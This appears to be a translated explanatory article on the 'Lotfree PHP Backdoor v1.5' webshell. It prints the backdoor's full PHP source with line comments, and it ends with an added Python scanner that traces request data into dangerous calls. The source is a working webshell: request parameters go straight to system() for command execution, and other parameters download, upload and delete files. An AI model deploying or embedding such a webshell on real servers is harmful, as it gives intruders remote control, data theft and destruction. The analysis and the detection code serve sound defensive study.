Explanation of PHP webshell files

Source: Internet
Author: User

PHP Backdoor Version 1.5 is a PHP backdoor program written by sirius_black / lotfree team. Here we perform a simple analysis of it, partly as notes for learning PHP. The commands the backdoor can execute depend on the permissions of the user under which the web server and PHP were installed; if that user is an administrator, various operating system commands can be executed.

Below is the backdoor program with comments:


    <?php
    // ereg_replace() was removed in PHP 7.0 and each() in PHP 8.0, so this sample targets older PHP versions.
    // good_link() collapses repeated slashes and "/name/.." sequences; it does not confine the path to any base directory.
    function good_link($link)
    {
        $link = ereg_replace("/+", "/", $link);
        $link = ereg_replace("/[^/(..)]+/\.\.", "/", $link);
        $link = ereg_replace("/+", "/", $link);
        if (!strncmp($link, "./", 2) && strlen($link) > 2) $link = substr($link, 2);
        if ($link == "") $link = ".";
        return $link;
    }
    // $_REQUEST is used to obtain the data submitted to this file.
    $dir = isset($_REQUEST['dir']) ? $_REQUEST['dir'] : "."; // if no dir is defined, use the default value "."
    $dir = good_link($dir);
    $rep = opendir($dir); // open a handle on the path specified by dir
    chdir($dir); // switch to the directory specified by dir
    if (isset($_REQUEST["down"]) && $_REQUEST["down"] != "") // if down is defined, send that file as a download
    {
        header("Content-Type: application/octet-stream");
        header("Content-Length: " . filesize($_REQUEST["down"]));
        header("Content-Disposition: attachment; filename=" . basename($_REQUEST["down"]));
        readfile($_REQUEST["down"]); // read the file into the output buffer
        exit();
    }
    ?>

    Lotfree PHP Backdoor v1.5

    <?php
    echo "The current absolute path is: " . getcwd() . "\n"; // obtain the current absolute path
    echo "dir = '$dir'\n";
    echo "Current directory, file list!\n";
    // If a command to be executed has been entered
    if (isset($_REQUEST['cmd']) && $_REQUEST['cmd'] != "")
    {
        echo "\n";
        system($_REQUEST['cmd']); // execute the entered command on the server and display the result
        echo "\n";
    }
    // If a file has been uploaded
    if (isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"])) // take the posted file and save it to the current directory
    {
        if ($_FILES["fic"]["size"] < $_POST["MAX_FILE_SIZE"]) // check the size against the limit, which is itself taken from the request
        {
            if (move_uploaded_file($_FILES["fic"]["tmp_name"], good_link("./" . $_FILES["fic"]["name"]))) // save the temporary file to the current directory
            {
                echo "The file was successfully saved: " . good_link("./" . $_FILES["fic"]["name"]) . "!\n";
            }
            else echo "File upload failed: " . $_FILES["fic"]["error"] . "\n";
        }
        else echo "File too large (the file size exceeds the limit)!\n";
    }
    if (isset($_REQUEST['rm']) && $_REQUEST['rm'] != "") // if rm is defined, the specified file is deleted
    {
        if (unlink($_REQUEST['rm'])) // unlink is PHP's file deletion function
            echo "Successfully deleted " . $_REQUEST['rm'] . "!\n";
        else echo "Failed to delete the file\n";
    }
    ?>

    <?php
    $t_dir = array();
    $t_file = array();
    $i_dir = 0;
    $i_file = 0;
    // Read the directory entries in a loop and place them in t_dir and t_file.
    while ($x = readdir($rep))
    {
        if (is_dir($x)) // the entry being processed is a directory
            $t_dir[$i_dir++] = $x;
        else // the entry being processed is a file
            $t_file[$i_file++] = $x;
    }
    closedir($rep); // close the directory handle opened by opendir
    while (1) // output the directories and files of the current path in a loop
    {
    ?>

    <?php
    // $_SERVER['PHP_SELF'] gives the current PHP script file name
    if ($y = each($t_file))
    {
        if ($y["key"] % 2 == 0) // even array index: the row gets a highlighted background
            echo "bgcolor='lightgreen'>\n";
        else // odd array index: plain row
            echo ">\n";
        echo "" . $y["value"] . "\n"; // the file is displayed and a download link is provided
    }
    else echo ">\n";
    ?>

    <?php
    if ($y)
    {
        // If it is a file, provide a link to delete the file
        if ($y["key"] % 2 == 0) echo "bgcolor='lightgreen'";
        echo ">Del";
    }
    else echo ">\n";
    ?>

    <?php
    if (!$x && !$y)
        break;
    }
    ?>

    <?php
    if ($x = each($t_dir))
    {
        $name = $x["value"]; // obtain the directory name from the t_dir array
        if ($name == '.') {}
        elseif ($name == '..') echo "UP (parent directory)\n"; // displays an UP link that lists the files in the parent directory
        else
            echo "" . $name . "\n";
    }
    ?>

    ?dir=">Return to the original directory

    Upload files to the current directory on the server:
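For defenders, the listing above reduces to one pattern: request superglobals reach system, readfile, unlink, opendir and move_uploaded_file, directly or through variables such as $dir. The following Python scanner is an added example, not part of the original article or of the backdoor; its sink table, the function names and the sample input are constructed for illustration, and it is a heuristic in which any function call (good_link included) keeps its argument tainted.

```python
import re
# Request-controlled superglobals, and sink -> (argument index that matters, capability).
SOURCES = {"$_REQUEST", "$_GET", "$_POST", "$_COOKIE", "$_FILES"}
SINKS = {"system": (0, "command execution"), "readfile": (0, "file download"),
         "unlink": (0, "file deletion"), "opendir": (0, "directory listing"),
         "move_uploaded_file": (1, "file upload to chosen path")}
CALL = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(", re.I)
VAR = re.compile(r"\$[A-Za-z_]\w*")
ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*=(?![=>])\s*(.+)", re.S)
# String literals and comments, matched in one pass so neither can hide the other.
TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|\'(?:\\.|[^\'\\])*\'|//[^\n]*|/\*.*?\*/', re.S)

def _blank(m):  # drop comments; reduce a string literal to the variable names in it
    t = m.group(0)
    return '"' + " ".join(VAR.findall(t)) + '"' if t[0] in "\"'" else " "

def call_args(code, start):
    """Split the argument list that starts at code[start] on top-level commas."""
    args, cur, depth = [], "", 0
    for ch in code[start:]:
        if ch == ")" and depth == 0:
            break
        depth += (ch in "([") - (ch in ")]")
        if ch == "," and depth == 0:
            args, cur = args + [cur], ""
        else:
            cur += ch
    return args + [cur]

def scan(php):
    """Return (sink, capability) for every sink that request data reaches."""
    tainted, findings = set(SOURCES), []
    for stmt in TOKEN.sub(_blank, php).split(";"):
        for m in CALL.finditer(stmt):
            idx, impact = SINKS[m.group(1).lower()]
            args = call_args(stmt, m.end())
            if idx < len(args) and tainted & set(VAR.findall(args[idx])):
                findings.append((m.group(1).lower(), impact))
        a = ASSIGN.search(stmt)
        if a and tainted & set(VAR.findall(a.group(2))):  # any call keeps the taint
            tainted.add(a.group(1))
    return findings
# Constructed sample assembled from calls that appear in the listing.
SAMPLE = r'''$dir = good_link(isset($_REQUEST['dir']) ? $_REQUEST['dir'] : ".");
$rep = opendir($dir); // system("x") inside a comment is ignored
if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); }
move_uploaded_file($_FILES["fic"]["tmp_name"], good_link("./" . $_FILES["fic"]["name"]));'''
print(scan(SAMPLE))
```

An upload handler that writes to a server-chosen name is not flagged, because only the destination argument of move_uploaded_file is checked.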






